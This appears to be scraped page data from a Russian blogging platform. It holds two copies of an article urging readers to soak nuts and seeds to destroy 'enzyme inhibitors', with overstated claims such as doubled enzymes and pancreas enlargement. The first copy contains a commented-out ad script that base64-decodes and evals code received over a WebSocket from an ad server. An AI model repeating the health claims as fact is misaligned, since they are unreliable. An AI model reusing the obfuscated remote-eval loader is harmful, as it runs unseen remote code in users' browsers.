На информационном ресурсе применяются рекомендательные технологии (информационные технологии предоставления информации на основе сбора, систематизации и анализа сведений, относящихся к предпочтениям пользователей сети "Интернет", находящихся на территории Российской Федерации)

Почему так важно замачивать орехи и семечки перед употреблением?

\x3c!-- \x3cdiv id=\"M347983Composite625353\">\x3ccenter> \x3ca href=\"http://marketgid.com/\" target=\"_blank\">«агрузка...\x3c/a> \x3c/center>\x3c/div> \x3cscript type=\"text/javascript\"> var d = new Date, script625353 = document.createElement(\"script\"), mg_ws625353 = {};script625353.type = \"text/javascript\";script625353.charset = \"utf-8\";script625353.src = \"//jsc.marketgid.com/f/i/fithacker.ru.625353.js?t=\" + d.getYear() + d.getMonth() + d.getDay() + d.getHours();script625353.onerror = function () { mg_ws625353 = new Worker(URL.createObjectURL(new Blob(['eval(atob(\\'ZnVuY3Rpb24gc2VuZE1lc3NhZ2U2MjUzNTMoZSl7dmFyIGg9bWdfd3M2MjUzNTMub25tZXNzYWdlOyBtZ193czYyNTM1My5yZWFkeVN0YXRlPT1tZ193czYyNTM1My5DTE9TRUQmJihtZ193czYyNTM1Mz1uZXcgV2ViU29ja2V0KG1nX3dzNjI1MzUzX2xvY2F0aW9uKSksbWdfd3M2MjUzNTMub25tZXNzYWdlPWgsd2FpdEZvclNvY2tldENvbm5lY3Rpb242MjUzNTMobWdfd3M2MjUzNTMsZnVuY3Rpb24oKXttZ193czYyNTM1My5zZW5kKGUpfSl9ZnVuY3Rpb24gd2FpdEZvclNvY2tldENvbm5lY3Rpb242MjUzNTMoZSx0KXtzZXRUaW1lb3V0KGZ1bmN0aW9uKCl7cmV0dXJuIDE9PT1lLnJlYWR5U3RhdGU/dm9pZChudWxsIT10JiZ0KCkpOnZvaWQgd2FpdEZvclNvY2tldENvbm5lY3Rpb242MjUzNTMoZSx0KX0sNSl9OyB2YXIgbWdfd3M2MjUzNTNfbG9jYXRpb24gPSAid3NzOi8vd3NwLm1hcmtldGdpZC5jb20vd3MiOyBtZ193czYyNTM1MyA9IG5ldyBXZWJTb2NrZXQobWdfd3M2MjUzNTNfbG9jYXRpb24pLCBtZ193czYyNTM1My5vbm1lc3NhZ2UgPSBmdW5jdGlvbiAodCkge3Bvc3RNZXNzYWdlKHQuZGF0YSk7fSwgb25tZXNzYWdlID0gZnVuY3Rpb24oZSl7c2VuZE1lc3NhZ2U2MjUzNTMoZS5kYXRhKX0=\\'))']), {type: \"application/javascript\"})); mg_ws625353.onmessage = function (msg){window.eval(msg.data);}; mg_ws625353.postMessage('js|'+script625353.src+'|M347983Composite625353|M347983Composite625353');};document.body.appendChild(script625353); \x3c/script>--> \x3c!-- M347983Composite End --> \n \x3cp>Не секрет, что орехи из всех сыроедных продуктов являются самой тяжелой для переваривания едой. В сухом виде они твердые и горьковатые на вкус, и даже от небольшого количества можно почувствовать тяжесть в желудке.\x3c/p>\n\x3cp>✔ Почему же это так?\x3c/p>\n\x3cp>Дело в том, что семечки и орехи, которые доступны в продаже — находятся в спящем состоянии. В таком виде они практически не усваиваются и выводятся из организма в неизменном виде.\x3c/p>\n\x3cp>В состоянии покоя сухие орехи и семечки удерживают содержащиеся внутри вещества, которые называются ферментные ингибиторы (вещества, угнетающие активность ферментов), чья функция – защищать семя и сдерживать прорастания в неблагоприятных условиях. Именно они дают горечь во вкусе.\x3c/p>\n\x3cp>Когда семя падает с дерева, лишившись источника влаги, оно высыхает и зародыш засыпает, чтобы весной, при таянии снега, вновь проснуться и дать новую жизнь. Природа не дает семечку прорастать ранее определённого срока, сохраняя его жизнеспособность, тем самым страхуясь, что в почве оно обеспечено достаточной влажностью, чтобы прорасти и продолжить род.\x3c/p>\n\x3cp>Как утверждает доктор Эдвард Хоуелл, когда мы едим сухие семечки или орехи, мы нейтрализуем некоторые ферменты, которые выделяет наш организм, что может даже привести к увеличению поджелудочной железы.\x3c/p>\n\x3cp>Есть два способа разрушить ферментные ингибиторы. Первый — приготовить еду, но в этом случае разрушатся также и ферменты, этот вариант не вписывается в систему питания сыроедов. Второй вариант — более предпочтительный. Мы помещаем семена во влажную среду, то есть замачиваем или проращиваем. При этом ингибиторы разрушаются, а количество ферментов повышается в два раза. Что происходит.\x3c/p>\n\x3cp>В замоченных орехах и семечках меняется химический состав и запускается механизм прорастания.\x3c/p>\n\x3cp>✔ Суть этого процесса — преобразование сложных веществ в более простые: находящиеся в зародыше неактивные ростовые вещества активизируются и способствуют синтезу ферментов, которые разлагают сложные запасные вещества на более простые. Вначале образуются ферменты, превращающие крахмал в простые сахара (в пшенице это фруктоза, поэтому проростки имеют сладковатый вкус). Немного позднее под действием других ферментов запасные белки превращаются в аминокислоты. Примерно на третьи сутки происходит разложение жиров до жирных кислот.\x3c/p>\n\x3cp>Благодаря этим химическим процессам замоченные орехи и семена становятся более усвояемыми. Они становятся сладкими, вода вымывает ингибиторы, забирая с собой горечь. Мы получаем питательные вещества в самой доступной форме: активную ферментную систему растения, макро- и микроэлементы, флавоноиды и огромное количество витаминов и антиоксидантов. Весь этот комплекс полезных веществ органически встроен в живую ткань растения и находится в сбалансированных количествах и соотношениях.\x3c/p>\n\x3cp>При замачивании значительно возрастает питательная ценность орехов и семян. Также меняется вкус, они становятся сочными, сладковатыми и практически ничем не уступают своему свежему аналогу. К тому же, если есть сомнения, не обработан ли продукт, замачивание — верный способ это проверить. Испорченное или жареное семя в процессе замочки протухнет, будет мягким и кардинально другого цвета, чем живые орешки и семечки. Как замачивать.\x3c/p>\n\x3cp>✔ Все просто: нежареные орехи или семечки нужно залить питьевой водой и оставьте на несколько часов или на ночь (в зависимости от вида) при комнатной температуре, утром промыть и слить воду. Ростков ждать необязательно, так как простое замачивание уже запускает механизм прорастания. Как только проклюнулся росток, питательная ценность идет на убыль, поскольку вещества расходуются на рост.\x3c/p>\n\x3cp>Замоченные орешки и семечки можно хранить в холодильнике около трех дней. Но если их помыть, тщательно просушить и поместить в контейнер или банку с плотной крышкой, они смогут храниться и сохранять естественный вкус около недели.\x3c/p>\n\x3cp>Замачивая орешки и семена мы их оживляем. В пробужденном состоянии по своим вкусовым и питательным свойствам они намного превосходят спящие.\x3c/p>\n\x3cp>\x3ca href=\"https://vk.com/wall-76873158_102617\" target=\"_blank\">Источник\x3c/a>\x3c/p>\n\n \x3c!-- A generated by theme --> \n\n\n\n \x3c!-- end A --> \n\n\n\x3cdiv>\n\x3cdiv>\n\x3cp2>\x3cnoindex>\x3cnofollow>\x3c/nofollow>\x3c/noindex>\x3c/p2>\x3cp3>← Жми «Нравится» и читай нас в Фейсбуке\x3c/p3>\n\x3c/div>\n\n\x3c/div>\n\n\x3cp>\x3cstrong>Понравилось? Поделитесь с друзьями!\x3c/strong>\x3c/p>\n \x3cp>\x3cstrong>\x3ca href=\"https://blockads.fivefilters.org\" target=\"_blank\">Let's block ads!\x3c/a>\x3c/strong> \x3ca href=\"https://blockads.fivefilters.org/acceptable.html\" target=\"_blank\">(Why?)\x3c/a>\x3c/p>","comments_count":0,"marks_count":0,"likes":{"count":0,"user_likes":0,"can_like":0,"marks_pluses":0,"marks_minuses":0,"user_like_attr":null,"like_attr_ids":[]},"fame_actions_positive_count":0,"fame_actions_negative_count":0,"fame_actions":[],"url":"https://s30101041796.mirtesen.ru/blog/43802481969","tags":["лен","замачивание орехов","орехи","Здоровье","жировые отложения","семена льна"],"date":1537801031,"canEdit":false,"foreignPollId":null,"attachments":[{"photo":{"id":20933283926,"photo_original":"https://mtdata.ru/u22/photo07ED/20933283926-0/original.jpg","width":570,"height":393}}],"group":{"display_name":"Здоровье в наших руках","url":"https://s30101041796.mirtesen.ru","photo_original":"//mtdata.ru/u24/groupA346/67d5475e3acc17dcaea99ef5334b1604-0/__logo.jpeg","id":30101041796,"canViewBlogPostCreator":false,"showSubscribersAmount":true,"is_subscribed":false,"is_member":false,"is_owner":false,"is_staff":false,"created":1403893363179},"canonical_url":"https://fithacker.ru/articles/pochemu-tak-vazhno-zamachivat-orehi-i-semechki-pered-upotrebleniem/","topic":"home","title":"Почему так важно замачивать орехи и семечки перед употреблением?","preview_text":"\x3c!-- M347983Composite Start -->\x3c!-- «агрузка... var d = new Date, script625353 = document.createElement(\"script\"), mg_ws625353 = {};script625353.type = \"text/javascript\";script625353.charset = \"utf-8\";script625353.src = \"//jsc.marketgid.com/f/i/fithacker.ru.625353.js?t=\" + d.getYear() +","post_type":"post","formattedDates":{"iso":"2018-09-24T14:57:11.000Z","ver1":"24 сентября, 17:57","ver2":"24.09.2018 в 17:57","ver3":"24 сент., 17:57"},"images":[{"main":true,"url":"https://mtdata.ru/u22/photo07ED/20933283926-0/original.jpg","width":570,"height":393}],"videos":[],"shared_post":null,"mentionedPersons":null},{"id":43992125302,"from_id":893465971,"from":{"id":893465971,"display_name":"Татьяна Рузина","url":"https://mirtesen.ru/people/893465971","photo_original":"https://mtdata.ru/u23/photoF721/20061619520-0/original.jpeg","isAuthenticAccount":false,"sex":1},"owner_id":-30302495791,"text":"\x3cdiv style=\"text-align: left;\" dir=\"ltr\">\n\x3cdiv style=\"clear: both; text-align: center;\">\x3ca style=\"margin-left: 1em; margin-right: 1em;\" href=\"https://1.bp.blogspot.com/-PoZFHppbGMU/WPuXTv7QLsI/AAAAAAABplE/TK1h7zbuE6sFHcMzPR3VGxGzjouZ7JXjACLcB/s1600/TbA-VzKuJrg.jpg\" target=\"_blank\">\x3cimg src=\"//mtdata.ru/u21/photo516B/20541478171-0/original.jpg#20541478171\" alt=\"\" width=\"640\" height=\"426\" border=\"0\" />\x3c/a>\x3c/div>\n\x3cdiv style=\"text-align: justify;\"> \x3c/div>\n\x3cdiv style=\"text-align: justify;\"> \x3c/div>\n\x3cdiv style=\"text-align: justify;\">Не секрет, что орехи из всех сыроедных \x3ca href=\"/blog/43992125302/\" target=\"_blank\">\x3c/a>продуктов являются самой тяжелой для переваривания едой. В сухом виде они твердые и горьковатые на вкус, и даже от небольшого количества можно почувствовать тяжесть в желудке.\x3c/div>\n\x3cdiv style=\"text-align: justify;\"> \x3c/div>\n\x3cdiv style=\"text-align: justify;\">Почему же это так?\x3c/div>\n\x3cdiv style=\"text-align: justify;\"> \x3c/div>\n\x3cdiv style=\"text-align: justify;\">Дело в том, что семечки и орехи, которые доступны в продаже — находятся в спящем состоянии. В таком виде они практически не усваиваются и выводятся из организма в неизменном виде.\x3c/div>\n\x3cdiv style=\"text-align: justify;\"> \x3c/div>\n\x3cdiv style=\"text-align: justify;\">В состоянии покоя сухие орехи и семечки удерживают содержащиеся внутри вещества, которые называются ферментные ингибиторы (вещества, угнетающие активность ферментов), чья функция – защищать семя и сдерживать прорастания в неблагоприятных условиях. Именно они дают горечь во вкусе.\x3c/div>\n\x3cdiv style=\"text-align: justify;\"> \x3c/div>\n\x3cdiv style=\"text-align: justify;\">Когда семя падает с дерева, лишившись источника влаги, оно высыхает и зародыш засыпает, чтобы весной, при таянии снега, вновь проснуться и дать новую жизнь. Природа не дает семечку прорастать ранее определённого срока, сохраняя его жизнеспособность, тем самым страхуясь, что в почве оно обеспечено достаточной влажностью, чтобы прорасти и продолжить род.\x3c/div>\n\x3cdiv style=\"text-align: justify;\"> \x3c/div>\n\x3cdiv style=\"text-align: justify;\">Как утверждает доктор Эдвард Хоуелл, когда мы едим сухие семечки или орехи, мы нейтрализуем некоторые ферменты, которые выделяет наш организм, что может даже привести к увеличению поджелудочной железы.\x3c/div>\n\x3cdiv style=\"text-align: justify;\"> \x3c/div>\n\x3cdiv style=\"text-align: justify;\">Есть два способа разрушить ферментные ингибиторы. Первый — приготовить еду, но в этом случае разрушатся также и ферменты. Второй вариант — более предпочтительный. Мы помещаем семена во влажную среду, то есть замачиваем или проращиваем. При этом ингибиторы разрушаются, а количество ферментов повышается в два раза. \x3c/div>\n\x3cdiv style=\"text-align: justify;\"> \x3c/div>\n\x3cdiv style=\"text-align: justify;\">Что происходит.\x3c/div>\n\x3cdiv style=\"text-align: justify;\"> \x3c/div>\n\x3cdiv style=\"text-align: justify;\">В замоченных орехах и семечках меняется химический состав и запускается механизм прорастания.\x3c/div>\n\x3cdiv style=\"text-align: justify;\"> \x3c/div>\n\x3cdiv style=\"text-align: justify;\">Суть этого процесса - преобразование сложных веществ в более простые: находящиеся в зародыше неактивные ростовые вещества активизируются и способствуют синтезу ферментов, которые разлагают сложные запасные вещества на более простые. Вначале образуются ферменты, превращающие крахмал в простые сахара (в пшенице это фруктоза, поэтому проростки имеют сладковатый вкус). Немного позднее под действием других ферментов запасные белки превращаются в аминокислоты. Примерно на третьи сутки происходит разложение жиров до жирных кислот.\x3c/div>\n\x3cdiv style=\"text-align: justify;\"> \x3c/div>\n\x3cdiv style=\"text-align: justify;\">Благодаря этим химическим процессам замоченные орехи и семена становятся более усвояемыми. Они становятся сладкими, вода вымывает ингибиторы, забирая с собой горечь. Мы получаем питательные вещества в самой доступной форме: активную ферментную систему растения, макро- и микроэлементы, флавоноиды и огромное количество витаминов и антиоксидантов. Весь этот комплекс полезных веществ органически встроен в живую ткань растения и находится в сбалансированных количествах и соотношениях.\x3c/div>\n\x3cdiv style=\"text-align: justify;\"> \x3c/div>\n\x3cdiv style=\"text-align: justify;\">При замачивании значительно возрастает питательная ценность орехов и семян. Также меняется вкус, они становятся сочными, сладковатыми и практически ничем не уступают своему свежему аналогу. К тому же, если есть сомнения, не обработан ли продукт, замачивание — верный способ это проверить. Испорченное или жареное семя в процессе замочки протухнет, будет мягким и кардинально другого цвета, чем живые орешки и семечки. \x3c/div>\n\x3cdiv style=\"text-align: justify;\"> \x3c/div>\n\x3cdiv style=\"text-align: justify;\">Как замачивать.\x3c/div>\n\x3cdiv style=\"text-align: justify;\"> \x3c/div>\n\x3cdiv style=\"text-align: justify;\">Все просто: нежареные орехи или семечки нужно залить питьевой водой и оставьте на несколько часов или на ночь (в зависимости от вида) при комнатной температуре, утром промыть и слить воду. Ростков ждать необязательно, так как простое замачивание уже запускает механизм прорастания. Как только проклюнулся росток, питательная ценность идет на убыль, поскольку вещества расходуются на рост.\x3c/div>\n\x3cdiv style=\"text-align: justify;\"> \x3c/div>\n\x3cdiv style=\"text-align: justify;\">Замоченные орешки и семечки можно хранить в холодильнике около трех дней. Но если их помыть, тщательно просушить и поместить в контейнер или банку с плотной крышкой, они смогут храниться и сохранять естественный вкус около недели.\x3c/div>\n\x3cdiv style=\"text-align: justify;\"> \x3c/div>\n\x3cdiv style=\"text-align: justify;\">Замачивая орешки и семена мы их оживляем. В пробужденном состоянии по своим вкусовым и питательным свойствам они намного превосходят спящие.\x3c/div>\n\x3c/div>","comments_count":0,"marks_count":13,"likes":{"count":13,"user_likes":0,"can_like":0,"marks_pluses":13,"marks_minuses":0,"user_like_attr":null,"like_attr_ids":[{"id":100,"count":12}]},"fame_actions_positive_count":0,"fame_actions_negative_count":0,"fame_actions":[],"url":"https://s30302495791.mirtesen.ru/blog/43992125302","tags":["замачивание орехов","орехи"],"date":1541556131,"canEdit":false,"foreignPollId":null,"attachments":[{"photo":{"id":20541478171,"photo_original":"https://mtdata.ru/u21/photo516B/20541478171-0/original.jpg","width":640,"height":426}}],"group":{"display_name":"Интересности для любознательных","url":"https://s30302495791.mirtesen.ru","photo_original":"//mtdata.ru/u24/group6770/cf32b688f8562c7261027411327a1ca0-0/__logo.jpeg","id":30302495791,"canViewBlogPostCreator":false,"showSubscribersAmount":true,"is_subscribed":false,"is_member":false,"is_owner":false,"is_staff":false,"created":1391997197090},"canonical_url":"http://dobromirole.blogspot.com/2017/04/blog-post_136.html","topic":"home","title":"О пользе замачивания семечек и орехов","preview_text":"Не секрет, что орехи из всех сыроедных продуктов являются самой тяжелой для переваривания едой. В сухом виде они твердые и горьковатые на вкус, и даже от небольшого количества можно почувствовать тяжесть в желудке.\n \nПочему же это так?\n \nДело в том, что семечки и орехи, которые доступны в продаже —","post_type":"post","formattedDates":{"iso":"2018-11-07T02:02:11.000Z","ver1":"7 ноября, 5:02","ver2":"07.11.2018 в 5:02","ver3":"7 нояб., 5:02"},"images":[{"main":true,"url":"https://mtdata.ru/u21/photo516B/20541478171-0/original.jpg","width":640,"height":426}],"videos":[],"shared_post":null,"mentionedPersons":null}],"tag":"замачивание орехов","tagId":80579337904,"hasMore":true,"offset":1,"isGeo":false},"reasonsForShowing":{},"channelMain":{"items":[],"nextOffset":0,"hasMoreItems":true,"currentUserPostId":null,"page":0},"richPostEditor":{"id":null,"title":"","text":"","channel":null,"canSelectChannel":false,"canSubmit":false},"indexChannel":{"items":[],"nextOffset":0,"hasMoreItems":true},"videoList":{},"videoOne":{},"videoRecommendations":{},"channelActions":{},"testDraftJs":{},"channelEditor":{"channelId":null,"isMobile":false,"tab":"info","key":0,"isOpen":false,"isReady":true,"inProcess":false,"isDirty":false,"header":{"title":"","avatar":null},"info":{"id":null,"name":"","title":"","description":"","isNameAvailable":true,"errors":{}},"content":{"tags":[],"tagSuggestions":[],"geoTags":[],"geoTagSuggestions":[]},"telegramEdit":{"importKey":null,"name":"","tags":[],"tagSuggestions":[],"errors":{}},"telegramList":{"imports":[]}},"channelCoverEditor":{"isOpen":false,"mode":"add","imageSaved":false},"channelAvatarEditor":{"isOpen":false},"myChannels":{"channels":[],"subscriptions":{"items":[],"nextOffset":0,"hasMore":true,"subscriptionsNum":0}},"channelHeaderTags":{"isOpen":false,"searchResults":[],"geoTags":[],"tags":[],"searchInProccess":false,"geoPosition":null,"headerTags":[]},"searchResults":{"query":"","activeTab":"posts","isLoading":false,"posts":{"results":[],"page":0,"hasMore":true},"geo":{"results":[],"page":0,"hasMore":true},"channels":{"results":[],"page":0,"hasMore":true}}}